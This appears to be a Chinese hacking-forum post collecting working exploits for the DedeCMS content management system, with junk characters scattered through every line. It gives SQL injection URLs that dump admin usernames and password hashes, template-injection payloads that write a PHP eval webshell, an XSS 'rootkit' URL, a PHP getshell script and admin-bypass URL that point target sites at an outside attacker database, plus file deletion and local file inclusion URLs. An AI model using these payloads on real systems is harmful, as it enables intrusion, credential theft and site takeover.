|
|
' l1 w! p6 }: P5 u) q6 ?Dedecms 5.6 rss注入漏洞1 z! @! l% o0 H: T6 q* A% l/ A3 Z
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1% w1 S" c' ~9 \! M* ]% D( ]' [0 ~. \; a
' ?* s0 G ^8 _! T
# G D' k% \7 \) J2 C) j: K
% B' Z3 N( {, ^" S. W8 j9 r' ^" N
2 Q% i+ D7 E% s4 f/ Y& g. L, P% @; k+ p6 D6 g
6 z6 K6 Q- V) E/ l5 o" X% o: a
, H8 V% }( O- N' j6 ?* z o5 U
" g8 l8 K. t# G" [) u, M- YDedeCms v5.6 嵌入恶意代码执行漏洞
# m1 X9 |+ z8 w注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}5 L+ ~' ?" b- m$ j
发表后查看或修改即可执行
( ^9 t% M% V9 f: xa{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}3 m* ~3 I+ U2 W
生成x.php 密码xiao,直接生成一句话。
& I8 Q) W% A* `* Q9 ^$ W# o+ Y( T9 z
1 |- M+ f5 ~' s' G& s
8 C. H& S, N+ L- B* Q8 _* F
/ s! w0 w$ w4 N$ P/ ]6 K# Q% N% h4 a. Z* j! n
- M& l" P& E5 n) P; \% R
p: g& v! D E" \
5 T5 z: p' E- o# zDede 5.6 GBK SQL注入漏洞* o0 s1 Q- Z+ h7 B- E2 z
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7''; t1 A* K; i8 H" B a+ h9 T1 {$ |
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe$ n7 A7 R# a" u9 q8 s
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7; J8 H! X" A* t; L. D) F
n f4 y1 d, G& {$ l% O* Z/ c2 C# p6 q
5 V9 R% {. x8 D4 ^, y! q L% t
, M+ V, H; h+ O/ ]
6 k, |- C$ I9 S3 x; ~5 h
" q7 ?; [/ a4 S- \+ R* |1 {) F1 ]$ E3 O
9 F1 n( H; J" }# q) J
! j* N, ?! z0 dDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
7 ?# Y' Y$ _& T$ Y0 l( ~7 X0 Dhttp://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
9 G' D- V/ V7 s1 I. w. o1 U3 d" U- L3 ~$ Q
/ @. y3 o0 a$ O' _4 d* h
. L) j: ?2 M! L& {# ^, Q7 k7 R2 s
0 { s0 T% g: m$ G
6 o, ?6 f+ F1 K2 n8 i; h$ [$ c' W6 g4 @* i6 u. S) x+ `
DEDECMS 全版本 gotopage变量XSS漏洞
" ~% o* }1 x/ C A1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
7 L2 E9 F5 u) `0 zhttp://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="& b$ V8 J; P/ c1 M
4 v0 j8 T4 I! M. b, N5 ^5 q' y& p5 K( { V6 s
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。 1 }8 c$ U& N0 }3 s8 ^, I; N
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
8 i1 ]7 E- y5 N+ u4 x6 D3 E& p+ p7 v7 n$ S
# Q+ C) ] Y7 q5 O0 r5 R
http://v57.demo.dedecms.com/dede/login.php
- c9 T! W/ @) m4 G. z+ C
- V: E) {: @/ A1 l! s s8 v2 R7 A9 c9 c! j+ y
color=Red]DeDeCMS(织梦)变量覆盖getshell
: ?2 b2 a' A0 }: a2 h. N- r#!usr/bin/php -w( `5 u1 U( C1 K5 m7 L# k, _
<?php6 ]% e6 {9 L/ u6 W2 _
error_reporting(E_ERROR);- x M# C0 w/ `7 }
set_time_limit(0);6 Z0 M# ], Y7 A- v8 |4 [- B' l
print_r('
- ]; E% `+ |5 w- N5 `* L! X& YDEDEcms Variable Coverage
2 O8 |' S& H: J2 K: S qExploit Author: www.heixiaozi.comwww.webvul.com
x+ ]& n1 g: L2 l; Y+ v);
% u5 K, W0 V' ~4 e( \7 fecho "\r\n";
( G* N; j( B+ A( m/ Mif($argv[2]==null){
2 T+ w4 w+ P5 @print_r('
- [2 L% j& V* w' b2 T/ R) d+---------------------------------------------------------------------------+) S1 P5 A, Q1 U
Usage: php '.$argv[0].' url aid path: R% l0 d4 ^6 V0 L- p/ u
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
1 j: \1 m# w4 I+ @Example:
8 |- j* r' C! d" o& f, B2 w: }4 lphp '.$argv[0].' www.site.com 1 old
5 s9 J% S+ P& ^# n s+ x+---------------------------------------------------------------------------+
( w( g7 C+ |; k+ R');* c% O' P+ d+ C) Y$ g
exit;
) I- G0 q9 }9 K9 Y3 t5 _8 Z! @}
; o/ B3 K1 h( g: v% a& X2 H$url=$argv[1];4 [" y& {0 c! L) ^, L$ _
$aid=$argv[2];
6 k& S- D+ M+ D: a2 m) E$path=$argv[3];/ g. o* W3 A- I4 S& ~
$exp=Getshell($url,$aid,$path);5 C4 z9 k V m5 Z+ F; e2 j
if (strpos($exp,"OK")>12){+ k2 M# b3 C8 x
echo "
t2 b; m; F( g& A! c, w) pExploit Success \n";, ?7 j9 P1 p/ K( n/ Q
if($aid==1)echo "
/ y- U) l5 }3 Y. q0 s+ K: cShell:".$url."/$path/data/cache/fuck.php\n" ;! U" K0 `4 v5 K' i8 s' U
- D7 g5 l7 \8 b' p1 \
" @6 Q: r: L8 L1 O1 _2 E% Z4 d
if($aid==2)echo "1 F2 Q0 C! v) g
Shell:".$url."/$path/fuck.php\n" ;
9 w( h- d/ b6 s: y v, s& ^2 Q! s" y8 W& G6 k' |
3 A; i0 n; K- |% r. Fif($aid==3)echo "& l0 ~. B7 f& a! |4 K4 }
Shell:".$url."/$path/plus/fuck.php\n";
" R% q& t, F) H7 l( C7 K( t4 {% s/ m) v# H. k
9 s: L1 q+ G6 {( h4 h# _}else{
2 d5 s/ w9 w' o9 N& }( |! {& a7 Techo "
& K5 P8 i8 p, @" w; ZExploit Failed \n";( n: w& d5 @4 A6 K& i0 K' O! T
}
" A$ ^7 Y* p3 i; V2 N" S0 z% p' }/ @function Getshell($url,$aid,$path){; `* m1 n; o) L3 @* b0 ~/ G
$id=$aid;% U/ E7 L5 f9 Y( x
$host=$url;% x2 l# ^+ a1 I' J* @3 ~" G' R8 a
$port="80";
) P' E( Q. Y& J! i$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
7 i/ s1 L" q- o+ I' e) n3 ?$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
# V+ I6 `% i, e J- l8 {$data .= "Host: ".$host."\r\n";
q" g W. W0 Z$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
2 J; d: m8 s! J$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";+ B, q6 {! |; V- \
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";2 c, B4 h0 ^& a! C$ i+ N7 p
//$data .= "Accept-Encoding: gzip,deflate\r\n";
* i& u9 ?, I7 j& J8 [0 w$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
& E$ q: P6 E, ~( E: b! a& d$data .= "Connection: keep-alive\r\n";% U, W" F+ y7 v" `0 K0 N( ?
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";. h* e, Z, R& D9 @4 a
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
, [1 t7 A7 W4 c$data .= $content."\r\n";
- K. q% t( _0 {( h* D, z3 O4 z( k$ock=fsockopen($host,$port);
6 |, A+ J7 [4 d! Xif (!$ock) {
8 B0 S$ `/ X2 ` c) l0 {' C4 jecho "& @$ s" e E+ ]4 P! b) P) r: Y
No response from ".$host."\n";& X' S& Z: I( U5 f3 n. ~
}
+ A. T0 U" ]9 G: Q; I* s/ Ifwrite($ock,$data);
3 F# T3 F2 D" ?* I \& Q6 Cwhile (!feof($ock)) {2 v" |' Z: [0 y
$exp=fgets($ock, 1024);. D0 ^1 m( N# k! G8 j
return $exp;
* U% m+ r# P! ^ `}
) T' w% \/ e; a" R" r}
' C8 R6 x+ ^- {4 D7 ^6 [4 e* K" p8 |( j7 W. t
% v! G/ O7 u# E& H/ s?>6 O2 N% W. j$ x) u: B& ?
# x' W5 y) f& D6 a& o! K4 G! s. ^# l8 w4 k( }
: E9 c$ m- X% V: X' F, |; ^* y! F9 |: ?
( C9 f7 o$ L) S4 H8 _4 b* s* W
g" x" J% D8 S3 l$ @! M* Z# }9 p
0 F/ F! q2 Z2 b' _* H" [$ n' L" W5 u+ [2 W8 E* w( m3 O, b
+ a& G ~+ v. E( n! P5 h" h6 ~8 m
0 i) ?: M# v- k8 d: I5 Z; L
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
" D/ G" J' }0 W; f$ mhttp://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root7 X& [4 m b. V- s ?' d' g
3 a6 }, }7 d* t& m8 ?+ R
2 T- N4 `# b' E
把上面validate=dcug改为当前的验证码,即可直接进入网站后台% G% i c% q7 s2 @+ m: X
& t& E6 \. y. g8 y+ }% p0 s
$ e: n' h0 H% b9 ^此漏洞的前提是必须得到后台路径才能实现
! p- b) F: i: X9 H! g/ y G% a2 j
5 H' h: u& P6 b7 F
2 T6 g3 U' t7 t) _6 ]
# i4 S7 J0 n' ^4 R0 k' R& Z f" @+ F3 k( g9 ~2 N
9 y! o' w/ ~. y" \1 S8 n7 \8 m. D8 H# f( _+ W) |
+ z/ K9 b6 m' o/ e2 J ^2 h% S, h& Z) W5 t- ]+ Q8 R1 C
# C$ ^( Z% O( a i
4 H: M: i! @& l$ M9 x2 T: J' f3 vDedecms织梦 标签远程文件写入漏洞
- `/ |; N. {5 ?4 _. t/ L# |前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');- S- L+ c" x! U$ x" G+ L% q; i( J8 `
% J6 k, |0 ?4 o. ]5 O. {! }$ t8 s- ~ Q, ~# d+ d9 m
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
9 S/ X$ c% w8 W' V<form action="" method="post" name="QuickSearch" id="QuickSearch">
8 |% V/ [2 T. S5 z<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
- M' E4 |3 f' m. N- Y3 e* @( Z h8 m<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
4 H" q# y/ C/ `0 j/ n t1 {9 c# K3 _<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
0 d& T7 V& I) y<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />1 k( M* U0 z6 Y; ^
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />" z2 B" L/ ]& _6 `' U+ b0 T
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />( @! u; n) q1 q& R
<input type="text" value="true" name="nocache" style="width:400">
6 g7 A0 O% a6 O1 o<input type="submit" value="提交" name="QuickSearchBtn"><br />
6 t9 _$ p# C4 ]# f# V- W( S+ C# l</form>
, `- q1 ~: E. ], e, U! G<script>8 @$ }2 h5 {: k" d1 a& k
function addaction(); R. f$ N# l: {- C* K: q9 T) d
{
( @: W1 L7 F! f% u% v/ v* Wdocument.QuickSearch.action=document.QuickSearch.doaction.value;8 l- y1 s' S. s: L6 a" ?; x
}
; w: S5 Z- T3 I</script>6 H& z6 A5 X7 S0 P: \
& J/ C! [9 Q/ F( Z
" z6 L5 I/ n3 f v8 j
5 W: I3 x W; h7 q$ B
# _: c. B: J) P/ u' u0 k! I
& A2 C# M5 ~" s7 ^% \ f) }7 |2 v' X6 g; ]3 u( j9 J& }
- {4 A: N' d6 | e
' q8 j1 T$ W/ ~0 G" c1 u( P4 d1 ]
2 b3 k; K: O; f% j3 A) R8 H; \- S3 D5 m5 B w
DedeCms v5.6 嵌入恶意代码执行漏洞
' E3 i" M. Q s( J8 K/ F注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
0 h* w1 T* G# Y+ {0 Fa{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
" t3 @1 Z: E$ O7 a+ x) J生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得0 p3 c4 s Y1 Y+ T% v/ w
Dedecms <= V5.6 Final模板执行漏洞; |, u7 y ]) E
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:$ E7 n2 T& p; a8 k* c
uploads/userup/2/12OMX04-15A.jpg. Q, ]" C1 y4 ]$ X! I( K
( X/ C( N6 h: W
' `5 _7 d. k# K# r, x0 h# u, Y, n
模板内容是(如果限制图片格式,加gif89a):
5 b! r; Y% ?8 E5 t# r. ~{dede:name runphp='yes'}; ~9 Q ] ]! l, x. i
$fp = @fopen("1.php", 'a');; Y& d+ g& y5 T$ _) Y: K
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
2 E6 R5 W3 X) e9 Q$ e5 {@fclose($fp);1 x2 L, P" h. Z6 b
{/dede:name}
2 Z3 `- `2 C( w }' y2 修改刚刚发表的文章,查看源文件,构造一个表单:1 q0 r7 e) j& ^; r3 `4 m
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
2 N$ ?" a$ N% E<input type="hidden" name="dopost" value="save" />3 x$ Y- G* I, c' Y8 C
<input type="hidden" name="aid" value="2" />
. ?0 f% T. n6 `: S<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" /> U# W% m. W. m% K$ ^4 T
<input type="hidden" name="channelid" value="1" />7 u" V9 B, I; z/ L W d7 ?% ?
<input type="hidden" name="oldlitpic" value="" />
0 D5 h7 i9 p# e<input type="hidden" name="sortrank" value="1275972263" />$ p5 m6 P/ ]( k; A1 s
: s( {7 U* D- h- o! O+ |
, C3 K+ ]9 j9 T- ?( @- U
<div id="mainCp">" G% i) ^5 d6 G1 q; P
<h3 class="meTitle"><strong>修改文章</strong></h3>4 q& f0 ^" J( t7 U& E( V
! N' b: |) p- l) B, P$ S
) D; p) l+ E3 o1 i1 r$ R<div class="postForm">& n+ p/ D2 |7 a* m$ U
<label>标题:</label>
; U: z# J) d! M" b<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
8 \# }" ~0 t: W: e) r' N8 V
: a: S* w0 o* b$ h6 O4 L( ?1 S# _# g% ^/ L4 z5 r; r
<label>标签TAG:</label>
, H4 o6 D3 }. s<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
( M1 ~# q$ S9 O! z! m* G8 E6 q0 @
/ v" W" m" g0 o2 b4 k& V7 s N) _9 H! O
<label>作者:</label>- e3 X' f/ S$ r
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>9 _7 h# M ~6 r
* |3 Q5 C& m9 T: m) U0 y
' M, M5 _' f- ?' K. m F<label>隶属栏目:</label>
8 }# N: x# T5 x0 y; [1 Z<select name='typeid' size='1'>
! i# i4 a4 f" x; y) N6 U" J<option value='1' class='option3' selected=''>测试栏目</option>4 h7 Q; O* J$ U; ]3 Z
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
2 W% O' [# z% M+ [" E
2 r- l" ^- T$ _+ I( V/ u
8 F4 W! Y* e2 Z. h0 g( `<label>我的分类:</label>1 B1 J- i! c7 g1 z& ?0 T5 z1 M
<select name='mtypesid' size='1'>8 V& A4 t5 ~0 ?% D" ^
<option value='0' selected>请选择分类...</option>! d" L0 N( \9 A. H
<option value='1' class='option3' selected>hahahha</option>
0 t; @) a+ D2 S& W$ ~# w</select>' y# y& U( }1 q* p/ s9 {) s2 V
" w5 J$ I# X% J/ s( y' P( {: [
: p" \/ j8 {* ]3 F
<label>信息摘要:</label>9 B( o! r* k `6 K. {+ ?: F
<textarea name="description" id="description">1111111</textarea>
+ i$ J+ X, p" j" @(内容的简要说明)% e0 i- V0 G; z- [) ]
, A7 Q. Z+ h) K- Z) i/ c, K
4 q# [( a2 z7 I
<label>缩略图:</label>
3 ]2 H6 x( Q5 O y3 q5 L<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>0 N$ p+ E3 q/ e# C t: K& u
) F! Q( y# ?5 E' a; b, P
0 _$ ?7 p# B' P* n8 U2 m" `<input type='text' name='templet'5 X/ N1 v/ ?6 r1 \5 q9 V4 `. g+ y
value="../ uploads/userup/2/12OMX04-15A.jpg">
x8 [% R. f2 Q3 i+ f6 u9 g<input type='text' name='dede_addonfields'" H4 J* ]* n: Q( r4 f V( o5 T2 c+ F
value="templet,htmltext;">(这里构造)
, y# u4 C+ z4 z( l/ O4 [4 v6 g</div>" b! J; T9 w7 _
* [$ l% m3 u% p; l" z' c
, S* @+ P Y7 |/ F+ n; O/ X+ _3 g4 I<!-- 表单操作区域 -->4 u8 f( C5 n' T3 w. Z2 h( q
<h3 class="meTitle">详细内容</h3>
6 v6 g( R" f+ S0 [( A& l$ Q2 l
1 q! _- O& D* x" B) U2 c) k8 Q4 H$ X! a
<div class="contentShow postForm">
! N3 O6 o2 i2 }5 P) N; P5 w<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
3 B0 b" r9 d, G5 A: D
1 @# g1 O+ d K2 S5 j- H3 h5 j
+ C A& u; p% Q' \. l<label>验证码:</label>. i+ Y* ?0 P. B9 s" K. c
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />8 F2 G9 h. S6 `( d- ^/ ]* `8 j4 v% ]
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />& J* E8 z" O& f4 s) Z9 h6 Z" c
6 V9 w4 y( m& U1 o+ _
4 c& r( P/ f0 r7 I2 G$ W) P# d<button class="button2" type="submit">提交</button>2 D# B" e% W1 l& |& {; I% r
<button class="button2 ml10" type="reset">重置</button>
; ]% S1 ?" y* I2 R- t</div>5 ^, X6 a s5 N+ s5 _
2 h* A$ L0 t9 l6 H, s% e, A
. V8 D+ W/ i* E% A4 s" x8 n* ^</div>
! \% q. P5 B& T" s! e! S8 C) H3 n! i
9 f5 m" x% n; I0 o) z
! w1 A& g4 k- S, C- T: ?3 \</form>- l9 l& g" d0 i- a. {4 }& Z& f4 W6 B- X
7 _( @2 R0 G: P! u P/ i" {/ [
! M: z; s R3 u# _
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
- F; R1 g# |6 { m- T' X+ A假设刚刚修改的文章的aid为2,则我们只需要访问:9 r: z r. \2 g- p. o- N
http://127.0.0.1/dede/plus/view.php?aid=2( i' U: _; O3 B7 T9 J
即可以在plus目录下生成webshell:1.php8 \* Z1 \' d- R
3 v$ Q; ]% _9 \
9 ?8 i# D! \" ]# k2 W* N( c5 l
6 G' I7 k: `# \. r# Z3 [) ^7 `; d2 l0 {9 B' t, |, B
8 d) t5 r+ A5 E, U/ @% B* q
! X e& d/ z% Q9 | f
; V+ P( G/ K8 U) v7 ?7 k7 ^2 P5 u
) N2 v9 j& g& v
3 _. a9 i. g8 g6 H, o
U( K' a4 L' e, G; `% D8 @. ]1 @7 X" D; Z
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6), p, e2 _/ z; Y# ]' J
Gif89a{dede:field name='toby57' runphp='yes'}
! i, |+ H* A$ g$ dphpinfo();! E3 ?; M6 N) C
{/dede:field}
) O# T- \$ f7 y! V. ?7 U! z! a9 U4 E保存为1.gif
Y# H+ n! g+ l3 \. ?<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> 7 p0 t8 Z. O5 y+ _
<input type="hidden" name="aid" value="7" /> 8 Z, H) h6 s' u$ n+ l
<input type="hidden" name="mediatype" value="1" /> E5 ~" G2 E0 b5 P; t& j a
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> ' q9 f5 l3 f2 I1 H* \5 S# h
<input type="hidden" name="dopost" value="save" />
; T* [$ K. o3 K T+ U0 V<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
! ]0 U- O; l: G1 f& C<input name="addonfile" type="file" id="addonfile"/> , s' ?2 F2 d5 k, z$ V- Z# i0 d- b
<button class="button2" type="submit" >更改</button> 6 O" a* y: n1 `7 t7 J- h
</form>
5 u9 T1 i8 {3 m) X" l, U' x4 v5 n; E3 w2 d( X/ c& Q
. v: _1 U' {$ _$ e+ @' N
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif- y/ k4 }4 W6 L S2 E9 s0 m6 ]
发表文章,然后构造修改表单如下:
- |9 D8 }& f3 z, J, K* c1 I3 n+ v# E' s
7 {7 x4 M. Z4 F$ g/ s( q
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
* W* Z n! N6 F1 n. {- ?% G' h, h6 J<input type="hidden" name="dopost" value="save" />
6 @, B5 L9 v6 [7 Q6 _4 P<input type="hidden" name="aid" value="2" /> + ~* g8 f7 k* Q, p2 K! H+ n
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" /> 8 }! H; Q: z& g
<input type="hidden" name="channelid" value="1" /> 7 B8 R& b5 C0 H" Y/ F5 C! C1 @
<input type="hidden" name="oldlitpic" value="" /> 8 S1 ]) ]9 ?/ h- b* g$ ]) Z
<input type="hidden" name="sortrank" value="1282049150" /> 5 v3 p; N" {& \1 ?( n
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
2 F4 y: |, @/ h% Y U5 g3 h<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
% \. ]/ i1 N# s9 p7 L2 ]<select name='typeid' size='1'>
6 ?: t6 c+ `* A5 E<option value='1' class='option3' selected=''>Test</option>
' ~# o$ Z% u l; P+ F6 p<select name='mtypesid' size='1'> 3 [- {' n, k4 Z6 ^: L6 _: b
<option value='0' selected>请选择分类...</option> J; d/ h( ?+ }0 |, C
<option value='1' class='option3' selected>aa</option></select> 6 A% ~% |5 ~, q6 O
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
( x6 B+ l3 a$ |( i, d<input type='hidden' name='dede_addonfields' value="templet"> % r& p- @ I' a" E S6 B8 V
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> . Y, V' j: {2 G
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> & ]' ?3 K* o; P7 p6 i
<button class="button2" type="submit">提交</button> # y/ a/ {: b. T( i. G+ i8 ^
</form>2 Y3 O' M; r6 E6 w4 I z/ n
6 A/ _1 {" z8 m8 W4 ^4 ]2 i
6 m, y& I( m& e# m) p% @$ [
# q n1 X2 m% }& I% D
1 w9 {, u; Y0 o& _; p% v5 S3 F! Q: h- q
# a" H: l7 d* T2 `4 p6 p$ F& d' b( J+ P% e
" g: }3 m. M/ m# _/ j
, J6 M# @9 }; h8 _
; |0 `$ X& C& y8 a, O c
$ R8 B) f" Q# q2 T1 g% `' q* V) Q- F* D: s9 z; G0 ]' l1 k
织梦(Dedecms)V5.6 远程文件删除漏洞% b" _* ~; i& ^# K( X
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif9 L4 l) q7 z+ F/ t' d5 a
/ ^9 C9 }/ M) A ]" H+ A% C: G1 L- R+ I, ~- T
5 m, L; N/ ]* ?
9 }1 T' b9 F8 R, W, l+ s1 X, v v7 N, \3 c7 s
6 E9 {+ v# Q$ b1 V a1 ?4 r
; [: e, Z: W% ^# G2 \
* h6 a' p1 p+ ^0 I* T! I' f9 `3 ?
, r" Q1 ^% w5 h# w5 r# A% L7 _1 ]. [. b+ s3 C
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 & `$ E- g, v$ i# h9 l# P
http://www.test.com/plus/carbuya ... urn&code=../../0 P1 K$ {6 k$ e7 R/ G4 v' l8 \
" c/ y7 @: A. G/ Q# {
. R& F* K {& Y- |
. t- l: k0 J! M0 U% Q, y/ |
; j9 o; k: m) ~% g/ S4 c, R; b% d* W
5 u8 v2 F) a1 _. a9 p' H& E- g
* o( g+ T: `* Q' W- G
- u5 Q' b) z* z! S
/ I. S! T6 B, K) P. R- P, e. h8 M6 Z' _& I& c: V
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 / a9 i, q) j: C3 A# C5 r$ j
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
/ L; i$ S+ Y; N6 j7 G3 v. V密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5: C& m4 k+ N( q! }- q; I
; Z' D& r1 U, [% h
8 _% R1 F: n7 b @: ]8 C, n* ?7 A! L% {4 L1 B* e
/ G: R$ N% Z# \
2 M' L9 N( A0 t& r( `5 B& v& P+ N3 I
" B7 E7 X5 o9 o: p; j4 U9 w8 V8 z" z3 T% C" ?& W8 Q+ k
6 ]4 o: y$ `6 @# C) k' K
/ b" B. z6 x1 N" J
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
" v0 ]* _& v$ u% @9 ^http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
! u( U, M) x. _" }/ i( p0 D3 _$ b, T4 X' Q9 b. k& K
& B6 f$ |1 A: ?) X3 ~
& e/ ?1 H4 I( a
* {7 O w: R, Q+ ]) G7 A" u' a& F2 N, W Q' [! w9 y
2 ?6 b$ P: s( ~$ n2 f r2 P
) i! r8 A3 G5 B% {: e
' R- e" k O& V4 I7 X8 W$ A1 O/ K1 c/ M
